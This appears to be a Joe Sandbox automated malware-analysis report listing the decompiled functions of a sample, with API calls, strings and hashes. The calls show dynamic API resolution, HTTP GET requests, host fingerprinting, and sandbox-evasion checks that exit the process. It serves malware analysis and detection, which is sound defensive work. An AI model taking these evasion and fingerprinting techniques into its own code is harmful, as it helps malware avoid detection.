Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

Function 00419C10 Relevance: 203.7, APIs: 112, Strings: 4, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,00896E48), ref: 00419C2D
GetProcAddress.KERNEL32(76210000,00896F68), ref: 00419C45
GetProcAddress.KERNEL32(76210000,008C6118), ref: 00419C5E
GetProcAddress.KERNEL32(76210000,008C6040), ref: 00419C76
GetProcAddress.KERNEL32(76210000,008C5F80), ref: 00419C8E
GetProcAddress.KERNEL32(76210000,008C5F98), ref: 00419CA7
GetProcAddress.KERNEL32(76210000,00894A18), ref: 00419CBF
GetProcAddress.KERNEL32(76210000,008C5FB0), ref: 00419CD7
GetProcAddress.KERNEL32(76210000,008C6058), ref: 00419CF0
GetProcAddress.KERNEL32(76210000,008C6280), ref: 00419D08
GetProcAddress.KERNEL32(76210000,008C62C8), ref: 00419D20
GetProcAddress.KERNEL32(76210000,00896FA8), ref: 00419D39
GetProcAddress.KERNEL32(76210000,00896D28), ref: 00419D51
GetProcAddress.KERNEL32(76210000,00896FC8), ref: 00419D69
GetProcAddress.KERNEL32(76210000,00897068), ref: 00419D82
GetProcAddress.KERNEL32(76210000,008C6298), ref: 00419D9A
GetProcAddress.KERNEL32(76210000,008C6310), ref: 00419DB2
GetProcAddress.KERNEL32(76210000,00894D88), ref: 00419DCB
GetProcAddress.KERNEL32(76210000,00896EA8), ref: 00419DE3
GetProcAddress.KERNEL32(76210000,008C6328), ref: 00419DFB
GetProcAddress.KERNEL32(76210000,008C62B0), ref: 00419E14
GetProcAddress.KERNEL32(76210000,008C62F8), ref: 00419E2C
GetProcAddress.KERNEL32(76210000,008C62E0), ref: 00419E44
GetProcAddress.KERNEL32(76210000,00897088), ref: 00419E5D
GetProcAddress.KERNEL32(76210000,008C6340), ref: 00419E75
GetProcAddress.KERNEL32(76210000,008C8C20), ref: 00419E8D
GetProcAddress.KERNEL32(76210000,008C8AD0), ref: 00419EA6
GetProcAddress.KERNEL32(76210000,008C8C08), ref: 00419EBE
GetProcAddress.KERNEL32(76210000,008C8AE8), ref: 00419ED6
GetProcAddress.KERNEL32(76210000,008C8BA8), ref: 00419EEF
GetProcAddress.KERNEL32(76210000,008C8B90), ref: 00419F07
GetProcAddress.KERNEL32(76210000,008C8A40), ref: 00419F1F
GetProcAddress.KERNEL32(76210000,008C8B00), ref: 00419F38
GetProcAddress.KERNEL32(76210000,008947B0), ref: 00419F50
GetProcAddress.KERNEL32(76210000,008C8B18), ref: 00419F68
GetProcAddress.KERNEL32(76210000,008C8A70), ref: 00419F81
GetProcAddress.KERNEL32(76210000,00896D48), ref: 00419F99
GetProcAddress.KERNEL32(76210000,008C8BD8), ref: 00419FB1
GetProcAddress.KERNEL32(76210000,00896D68), ref: 00419FCA
GetProcAddress.KERNEL32(76210000,008C8B48), ref: 00419FE2
GetProcAddress.KERNEL32(76210000,008C8C98), ref: 00419FFA
GetProcAddress.KERNEL32(76210000,00896E88), ref: 0041A013
GetProcAddress.KERNEL32(76210000,00896DA8), ref: 0041A02B
LoadLibraryA.KERNEL32(008C8BC0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
LoadLibraryA.KERNEL32(008C8AB8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
LoadLibraryA.KERNEL32(008C8A58,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
LoadLibraryA.KERNEL32(008C8B78,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
LoadLibraryA.KERNEL32(008C8BF0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
LoadLibraryA.KERNEL32(008C8C38,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
LoadLibraryA.KERNEL32(008C8B30,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
LoadLibraryA.KERNEL32(008C8CE0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
GetProcAddress.KERNEL32(751E0000,00896DC8), ref: 0041A0DA
GetProcAddress.KERNEL32(751E0000,008C8C50), ref: 0041A0F2
GetProcAddress.KERNEL32(751E0000,00899A40), ref: 0041A10A
GetProcAddress.KERNEL32(751E0000,008C8C68), ref: 0041A123
GetProcAddress.KERNEL32(751E0000,00896CA8), ref: 0041A13B
GetProcAddress.KERNEL32(700F0000,00894E78), ref: 0041A160
GetProcAddress.KERNEL32(700F0000,00896AE8), ref: 0041A179
GetProcAddress.KERNEL32(700F0000,00894C98), ref: 0041A191
GetProcAddress.KERNEL32(700F0000,008C8B60), ref: 0041A1A9
GetProcAddress.KERNEL32(700F0000,008C8A88), ref: 0041A1C2
GetProcAddress.KERNEL32(700F0000,00896A08), ref: 0041A1DA
GetProcAddress.KERNEL32(700F0000,00896B48), ref: 0041A1F2
GetProcAddress.KERNEL32(700F0000,008C8C80), ref: 0041A20B
GetProcAddress.KERNEL32(753A0000,00896C68), ref: 0041A22C
GetProcAddress.KERNEL32(753A0000,00896968), ref: 0041A244
GetProcAddress.KERNEL32(753A0000,008C8CB0), ref: 0041A25D
GetProcAddress.KERNEL32(753A0000,008C8CC8), ref: 0041A275
GetProcAddress.KERNEL32(753A0000,00896BA8), ref: 0041A28D
GetProcAddress.KERNEL32(76310000,00894E00), ref: 0041A2B3
GetProcAddress.KERNEL32(76310000,00894CC0), ref: 0041A2CB
GetProcAddress.KERNEL32(76310000,008C8CF8), ref: 0041A2E3
GetProcAddress.KERNEL32(76310000,00896B08), ref: 0041A2FC
GetProcAddress.KERNEL32(76310000,008969E8), ref: 0041A314
GetProcAddress.KERNEL32(76310000,00894CE8), ref: 0041A32C
GetProcAddress.KERNEL32(76910000,008C8A10), ref: 0041A352
GetProcAddress.KERNEL32(76910000,00896B28), ref: 0041A36A
GetProcAddress.KERNEL32(76910000,00899AD0), ref: 0041A382
GetProcAddress.KERNEL32(76910000,008C8AA0), ref: 0041A39B
GetProcAddress.KERNEL32(76910000,008C8A28), ref: 0041A3B3
GetProcAddress.KERNEL32(76910000,00896C88), ref: 0041A3CB
GetProcAddress.KERNEL32(76910000,00896BE8), ref: 0041A3E4
GetProcAddress.KERNEL32(76910000,008C8D28), ref: 0041A3FC
GetProcAddress.KERNEL32(76910000,008C8D70), ref: 0041A414
GetProcAddress.KERNEL32(75B30000,00896A28), ref: 0041A436
GetProcAddress.KERNEL32(75B30000,008C8DA0), ref: 0041A44E
GetProcAddress.KERNEL32(75B30000,008C8DD0), ref: 0041A466
GetProcAddress.KERNEL32(75B30000,008C8D40), ref: 0041A47F
GetProcAddress.KERNEL32(75B30000,008C8D88), ref: 0041A497
GetProcAddress.KERNEL32(75670000,00896B88), ref: 0041A4B8
GetProcAddress.KERNEL32(75670000,00896A68), ref: 0041A4D1
GetProcAddress.KERNEL32(76AC0000,00896CC8), ref: 0041A4F2
GetProcAddress.KERNEL32(76AC0000,008C8D58), ref: 0041A50A
GetProcAddress.KERNEL32(6F4E0000,008968E8), ref: 0041A530
GetProcAddress.KERNEL32(6F4E0000,00896908), ref: 0041A548
GetProcAddress.KERNEL32(6F4E0000,00896988), ref: 0041A560
GetProcAddress.KERNEL32(6F4E0000,008C8D10), ref: 0041A579
GetProcAddress.KERNEL32(6F4E0000,00896C08), ref: 0041A591
GetProcAddress.KERNEL32(6F4E0000,00896A48), ref: 0041A5A9
GetProcAddress.KERNEL32(6F4E0000,008969A8), ref: 0041A5C2
GetProcAddress.KERNEL32(6F4E0000,00896A88), ref: 0041A5DA
GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0041A5F1
GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0041A607
GetProcAddress.KERNEL32(75AE0000,008C8DB8), ref: 0041A629
GetProcAddress.KERNEL32(75AE0000,00899AE0), ref: 0041A641
GetProcAddress.KERNEL32(75AE0000,008C8EA8), ref: 0041A659
GetProcAddress.KERNEL32(75AE0000,008C9040), ref: 0041A672
GetProcAddress.KERNEL32(76300000,00896AC8), ref: 0041A693
GetProcAddress.KERNEL32(6FE40000,008C9100), ref: 0041A6B4
GetProcAddress.KERNEL32(6FE40000,00896C28), ref: 0041A6CD
GetProcAddress.KERNEL32(6FE40000,008C8E18), ref: 0041A6E5
GetProcAddress.KERNEL32(6FE40000,008C9070), ref: 0041A6FD

Strings

1#v, xrefs: 00419F0D
P2#v, xrefs: 00419E1A
InternetSetOptionA, xrefs: 0041A5E5
HttpQueryInfoA, xrefs: 0041A5FC

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA$P2#v$1#v
API String ID: 2238633743-3014924196
Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
StrCmpCA.SHLWAPI(?,008CAEB0), ref: 00406303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
HttpOpenRequestA.WININET(00000000,GET,?,008CA638,00000000,00000000,00400100,00000000), ref: 00406385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
InternetCloseHandle.WININET(00000000), ref: 004064EF
InternetCloseHandle.WININET(00000000), ref: 004064F9
InternetCloseHandle.WININET(00000000), ref: 00406503

Strings

ERROR, xrefs: 004064C9
ERROR, xrefs: 00406407
GET, xrefs: 0040637C

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3074848878-2509457195
Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 004117C5
ExitProcess.KERNEL32 ref: 004117D1
strtok_s.MSVCRT ref: 004117E8

Strings

block, xrefs: 004117B7

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
Sleep.KERNEL32(0000EA60), ref: 00415A1B

Strings

ERROR, xrefs: 00415693
ERROR, xrefs: 00415849
ERROR, xrefs: 00415932
ERROR, xrefs: 004159FE
ERROR, xrefs: 0041577D
ERROR, xrefs: 00415636

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
HeapAlloc.KERNEL32(00000000), ref: 0041760A
wsprintfA.USER32 ref: 00417640

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Strings

\, xrefs: 00417560
C, xrefs: 0041754C
:, xrefs: 0041755C

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

Function 0081003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0081024D

Strings

cess, xrefs: 0081018D
kernel32.dll, xrefs: 0081008F, 00810095

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f6093475901ca60e80cc3f331bc2662dae69c62b94434f60525690b1d0a0d3c1
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9F526874A012299FDB64CF58C984BA8BBB5BF09304F1480E9E94DAB251DB70AEC4DF15

Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898850), ref: 004198A1
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A18), ref: 004198BA
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A00), ref: 004198D2
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A60), ref: 004198EA
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898AC0), ref: 00419903
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00899A30), ref: 0041991B
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00896F88), ref: 00419933
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00896E68), ref: 0041994C
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A30), ref: 00419964
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A48), ref: 0041997C
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A90), ref: 00419995
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A78), ref: 004199AD
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00896DE8), ref: 004199C5
Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898AA8), ref: 004199DE

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774

GetUserDefaultLCID.KERNEL32 ref: 00416A26

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00899BA0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
CloseHandle.KERNEL32(00000000), ref: 00416AF9
Sleep.KERNEL32(00001770), ref: 00416B04
CloseHandle.KERNEL32(?,00000000,?,00899BA0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
ExitProcess.KERNEL32 ref: 00416B22

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Strings

<, xrefs: 004047C9

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

